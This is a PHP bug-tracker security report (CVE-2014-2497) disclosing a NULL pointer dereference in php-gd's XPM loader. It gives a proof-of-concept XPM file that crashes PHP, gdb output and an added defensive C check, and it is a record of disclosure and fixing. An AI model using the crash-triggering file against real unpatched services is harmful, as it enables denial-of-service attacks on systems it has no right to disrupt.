Sec Bug #66901 php-gd 'c_color' NULL pointer dereference
Submitted: 2014-03-13 19:31 UTC Modified: 2014-08-04 08:43 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:0 (0.0%)
Same OS:0 (0.0%)
From: steventhomasseeley at gmail dot com Assigned: remi (profile)
Status: Closed Package: GD related
PHP Version: 5.4.26 OS: Fedora r17 (Beefy Miracle)
Private report: No CVE-ID: 2014-2497
 [2014-03-13 19:31 UTC] steventhomasseeley at gmail dot com
Description:
------------
php-gd <= v5.4.17-2 'c_color' NULL pointer dereference

so the bug is triggered in gdImageCreateFromXpm() on line 42 of gd/libgd/gdxpm.c:
---------------------------------------------------------------------------------

gdImagePtr gdImageCreateFromXpm (char *filename)
{
    XpmInfo info;
    XpmImage image;
    int i, j, k, number;
    char buf[5];
    gdImagePtr im = 0;
    int *pointer;
    int red = 0, green = 0, blue = 0;
    int *colors;
    int ret;

    ret = XpmReadFileToXpmImage(filename, &image, &info);
    if (ret != XpmSuccess) {
        return 0;
    }

    if (!(im = gdImageCreate(image.width, image.height))) {
        goto done;
    }

    number = image.ncolors;
    colors = (int *) safe_emalloc(number, sizeof(int), 0);
    for (i = 0; i < number; i++) {
        switch (strlen (image.colorTable[i].c_color)) {             // BOOM
--------------------------------------------------------------------------------------------------------

The call to strlen() parses image.colorTable[i].c_color, which is initialised as NULL if the particular color mapping uses a different key (such as monochrome/monovisual).

The xpmColorKeys array stores all available keys and can be found in libXpm:
----------------------------------------------------------------------------
const char *xpmColorKeys[] = {
    "s",                /* key #1: symbol */
    "m",                /* key #2: mono visual */
    "g4",               /* key #3: 4 grays visual */
    "g",                /* key #4: gray visual */
    "c",                /* key #5: color visual */
};

The following xpm file will trigger the bug:
--------------------------------------------
/* XPM */
static char * gv_xpm[] = {
"13 13   6 1",
"A  c #FFFFFF " /* "0" */,
"B  c #CCCCCC " /* "0.0399" */,
"C  c #999999 " /* "0.0798" */,
"D  m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */,
"E  c #333333 " /* "0.16" */,
"F  c #000000 " /* "0.2" */,
/* x-axis:  0 40 80 120 160 200 240 280 320 360 400 440 480 */
/* y-axis:  0 40 80 120 160 200 240 280 320 360 400 440 480 */
"FEDDDDCCCCCBA",
"FEDDDCCCCBBAB",
---------------------------------------------

POC: 

php > imagecreatefromxpm("monochome-poc.xpm");

(gdb) p colorTable[0]
$2 = {string = 0x7fa6cec524c0 "A", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58650 "#FFFFFF"}
(gdb) p colorTable[1]
$3 = {string = 0x7fa6cec58670 "B", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58690 "#CCCCCC"}
(gdb) p colorTable[2]
$4 = {string = 0x7fa6cec586b0 "C", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec586d0 "#999999"}
(gdb) p colorTable[3]
$5 = {string = 0x7fa6cec586f0 "D", symbolic = 0x0, m_color = 0x7fa6cec58710 "#666666", g4_color = 0x0, g_color = 0x0, c_color = 0x0}
(gdb) p colorTable[4]
$6 = {string = 0x7fa6cec58730 "E", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58750 "#333333"}
(gdb) p colorTable[5]
$7 = {string = 0x7fa6cec58770 "F", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58790 "#000000"}
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
__strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
39		movdqu	(%rdi), %xmm1
(gdb) bt
#0  __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
#1  0x00007f009474942a in gdImageCreateFromXpm (filename=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/libgd/gdxpm.c:42
#2  0x00007f009473d2c2 in _php_image_create_from (ht=<optimized out>, return_value=0x7f00a169be98, image_type=6, tn=0x7f0094753c00 "XPM", func_p=0x7f0094749340 <gdImageCreateFromXpm>, 
    ioctx_func_p=<optimized out>, return_value_used=<optimized out>, this_ptr=<optimized out>, return_value_ptr=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/gd.c:2534
#3  0x00007f00a19e5181 in zend_do_fcall_common_helper_SPEC (execute_data=0x7f00a1665060) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:643
#4  0x00007f00a199f017 in execute (op_array=0x7f00a169acf8) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:410
#5  0x00007f00a1932976 in zend_eval_stringl (str=str@entry=0x7f00a1699c88 "imagecreatefromxpm(\"0day/zero-day2.xpm\");\n", str_len=str_len@entry=42, retval_ptr=retval_ptr@entry=0x0, 
    string_name=string_name@entry=0x7f00a1a0cbdf "php shell code") at /usr/src/debug/php-5.4.17/Zend/zend_execute_API.c:1197
#6  0x00007f00a181fcdf in readline_shell_run () at /usr/src/debug/php-5.4.17/ext/readline/readline_cli.c:664
#7  0x00007f00a19e78c4 in do_cli (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:986
#8  0x00007f00a179ea9a in main (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:1364

Test script:
---------------
/* XPM */
static char * gv_xpm[] = {
"13 13   6 1",
"A  c #FFFFFF " /* "0" */,
"B  c #CCCCCC " /* "0.0399" */,
"C  c #999999 " /* "0.0798" */,
"D  m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */,
"E  c #333333 " /* "0.16" */,
"F  c #000000 " /* "0.2" */,
/* x-axis:  0 40 80 120 160 200 240 280 320 360 400 440 480 */
/* y-axis:  0 40 80 120 160 200 240 280 320 360 400 440 480 */
"FEDDDDCCCCCBA",
"FEDDDCCCCBBAB",

Expected result:
----------------
php > print imagecreatefromxpm("monochome-poc.xpm")."\n";
Resource id #4
php >

Actual result:
--------------
php > print imagecreatefromxpm("monochome-poc.xpm")."\n";
Segmentation fault (core dumped)
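
As an added defensive example (not the reporter's code and not libgd's actual patch), the colour-table loop rewritten so that c_color is checked before strlen() ever runs, exercised against a constructed table that mirrors the six gdb entries above; the XpmColorEntry layout, the Rgb type and the decode_c_colors name are assumptions made for this example.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Constructed mirror of libXpm's XpmColor as shown in the gdb dump above: a
 * row keeps only the key it used, the others stay NULL (assumed field order). */
typedef struct {
    const char *string, *symbolic, *m_color, *g4_color, *g_color, *c_color;
} XpmColorEntry;
typedef struct { int red, green, blue; } Rgb;
/* Hardened stand-in for the gdxpm.c colour loop (hypothetical helper, not
 * libgd's code): rows without a "c" key are rejected before strlen() runs, and
 * only "#rrggbb" is decoded. Returns rows written to out[], or -1 with *bad_row. */
static int decode_c_colors(const XpmColorEntry *table, int ncolors,
                           Rgb *out, int *bad_row)
{
    char buf[3] = {0, 0, 0};
    for (int i = 0; i < ncolors; i++) {
        const char *c = table[i].c_color;
        if (c == NULL) {              /* the pointer that reached strlen() on line 42 */
            *bad_row = i;
            return -1;
        }
        if (strlen(c) != 7 || c[0] != '#') {
            *bad_row = i;             /* other syntaxes: bail rather than guess */
            return -1;
        }
        buf[0] = c[1]; buf[1] = c[2]; out[i].red   = (int) strtol(buf, NULL, 16);
        buf[0] = c[3]; buf[1] = c[4]; out[i].green = (int) strtol(buf, NULL, 16);
        buf[0] = c[5]; buf[1] = c[6]; out[i].blue  = (int) strtol(buf, NULL, 16);
    }
    return ncolors;
}

/* Constructed table for the six rows of the PoC file: row "D" uses the "m"
 * key, so its c_color is NULL, exactly as colorTable[3] shows in gdb. */
static const XpmColorEntry poc_table[6] = {
    {"A", NULL, NULL,      NULL, NULL, "#FFFFFF"},
    {"B", NULL, NULL,      NULL, NULL, "#CCCCCC"},
    {"C", NULL, NULL,      NULL, NULL, "#999999"},
    {"D", NULL, "#666666", NULL, NULL, NULL},
    {"E", NULL, NULL,      NULL, NULL, "#333333"},
    {"F", NULL, NULL,      NULL, NULL, "#000000"},
};
int main(void)
{
    Rgb rgb[6]; int bad = -1;   /* exit 0: PoC table rejected at row 3, no crash */
    return (decode_c_colors(poc_table, 6, rgb, &bad) == -1 && bad == 3) ? 0 : 1;
}
```

The same check belongs before any other key-specific pointer (m_color, g_color, ...) if a loader is later extended to honour those keys.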

Patches

bug66901-fix.patch (last revision 2014-04-01 21:03 UTC by mejiaa at amazon dot com)

History

 [2014-03-14 06:19 UTC] pajoye@php.net
-Status: Open +Status: Feedback
 [2014-03-14 06:19 UTC] pajoye@php.net
Thanks for your bug report!

Can you post a link to such image please? A small one if possible.
 [2014-03-14 07:47 UTC] pajoye@php.net
Forget my last request, I should not reply before my 1st coffee :)
 [2014-03-14 18:26 UTC] remi@php.net
-Type: Bug +Type: Security -Private report: No +Private report: Yes -CVE-ID: +CVE-ID: 2014-2497
 [2014-04-01 21:06 UTC] mejiaa at amazon dot com
Just posted a fix I came up with for this, which includes a new unit test. Currently it just bails when it sees an image with an unsupported color key.
 [2014-08-04 08:43 UTC] remi@php.net
-Assigned To: +Assigned To: remi
 [2014-08-04 08:51 UTC] remi@php.net
Automatic comment on behalf of remi
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cf4753691dc55999373d1c576f62ecb298723420
Log: Fixed Bug #66901 php-gd 'c_color' NULL pointer dereference
 [2014-08-04 08:51 UTC] remi@php.net
-Status: Feedback +Status: Closed
 [2014-08-11 07:43 UTC] dmitry@php.net
Automatic comment on behalf of remi
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cf4753691dc55999373d1c576f62ecb298723420
Log: Fixed Bug #66901 php-gd 'c_color' NULL pointer dereference
 [2014-08-14 00:52 UTC] tyrael@php.net
Automatic comment on behalf of remi
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cf4753691dc55999373d1c576f62ecb298723420
Log: Fixed Bug #66901 php-gd 'c_color' NULL pointer dereference
 [2014-10-07 23:13 UTC] stas@php.net
Automatic comment on behalf of remi
Revision: http://git.php.net/?p=php-src-security.git;a=commit;h=cf4753691dc55999373d1c576f62ecb298723420
Log: Fixed Bug #66901 php-gd 'c_color' NULL pointer dereference
 [2014-10-07 23:24 UTC] stas@php.net
Automatic comment on behalf of remi
Revision: http://git.php.net/?p=php-src-security.git;a=commit;h=cf4753691dc55999373d1c576f62ecb298723420
Log: Fixed Bug #66901 php-gd 'c_color' NULL pointer dereference
 